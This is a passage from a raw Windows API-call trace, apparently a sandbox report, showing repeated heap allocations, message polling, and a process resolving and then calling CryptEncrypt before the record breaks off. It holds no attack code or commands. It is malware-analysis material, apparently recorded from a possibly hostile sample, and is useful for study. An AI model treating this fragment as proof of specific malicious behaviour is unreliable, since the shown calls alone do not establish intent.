hHeap=0x770000) returned 1 [0037.429] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cd00 [0037.429] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0037.429] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0037.429] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0037.429] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3c8 [0037.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0037.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0037.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0037.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0037.429] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0037.429] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0037.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0037.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0037.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0037.429] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0037.429] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0037.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0037.429] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0037.429] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0037.430] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0037.430] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0037.430] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.430] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0037.430] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cd00 [0037.430] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0037.430] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0037.430] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0037.430] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0037.430] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0037.430] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0037.430] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0037.430] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0037.430] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0037.430] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0037.430] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0037.430] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0037.430] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0037.430] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0037.430] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0037.430] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0037.430] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.430] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0037.430] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.430] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0037.430] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0037.431] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0037.435] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0037.435] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0037.435] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0037.435] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2340 [0037.435] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.435] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0037.435] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.435] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0037.435] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c88 [0037.435] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0037.435] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0037.435] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0037.435] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0037.435] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.435] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.435] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0037.435] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cd00 [0037.435] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0037.435] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0037.435] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3c8 [0037.435] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0037.435] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0037.435] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0037.436] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0037.436] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0037.436] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0037.436] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0037.436] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0037.436] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0037.436] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0037.436] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0037.436] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0037.436] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0037.436] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0037.436] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0037.436] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0037.436] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0037.436] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0037.436] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0037.436] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0037.436] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0037.436] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0037.436] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0037.436] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0037.436] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0037.436] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0037.436] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0037.436] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0037.436] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0037.436] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0037.436] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0037.436] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0037.436] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0037.436] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c88 | out: hHeap=0x770000) returned 1 [0037.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0037.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0037.437] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0037.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0037.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0037.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0037.437] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0037.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0037.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0037.437] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0037.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0037.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0037.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0037.437] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0037.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0037.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0037.437] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0037.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0037.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0037.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0037.437] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0037.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0037.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0037.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c88 [0037.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0037.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3c8 [0037.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0037.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x187d4) returned 0x965fc8 [0037.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0037.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x965fc8 | out: hHeap=0x770000) returned 1 [0037.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0037.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0037.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c88 | out: hHeap=0x770000) returned 1 [0037.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0037.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0037.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0037.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0037.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0037.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5bb8 [0037.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0037.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0037.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0037.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0037.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0037.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0037.439] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0037.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0037.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0037.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0037.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0037.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0037.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0037.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0037.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c88 [0037.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0037.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0037.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0037.440] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0037.440] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0037.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0037.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0037.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0037.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0037.440] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0037.440] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0037.440] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0037.440] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0037.440] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0037.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0037.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0037.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0037.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0037.440] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0037.440] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0037.440] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0037.440] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0037.440] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0037.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0037.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0037.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0037.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0037.440] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0037.440] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0037.440] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0037.440] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0037.440] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0037.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0037.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0037.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0037.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0037.441] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0037.441] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0037.441] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0037.441] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0037.441] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0037.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0037.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0037.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0037.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0037.441] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0037.441] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0037.441] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0037.441] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0037.441] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0037.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0037.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0037.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0037.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0037.441] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0037.441] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0037.441] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0037.441] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0037.441] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0037.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0037.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0037.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0037.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0037.441] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0037.442] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0037.442] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0037.442] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xd) returned 0x88ca48 [0037.442] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x88ca48, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0037.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0037.442] GetProcAddress (hModule=0x754b0000, lpProcName="CryptEncrypt") returned 0x754d779b [0037.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0037.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0037.442] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1be8 [0037.442] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0037.442] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0037.442] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0037.442] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0037.442] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0037.442] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da388 [0037.442] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0037.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0037.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0037.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0037.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0037.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0037.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da388 | out: hHeap=0x770000) returned 1 [0037.443] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0037.443] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0037.443] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, 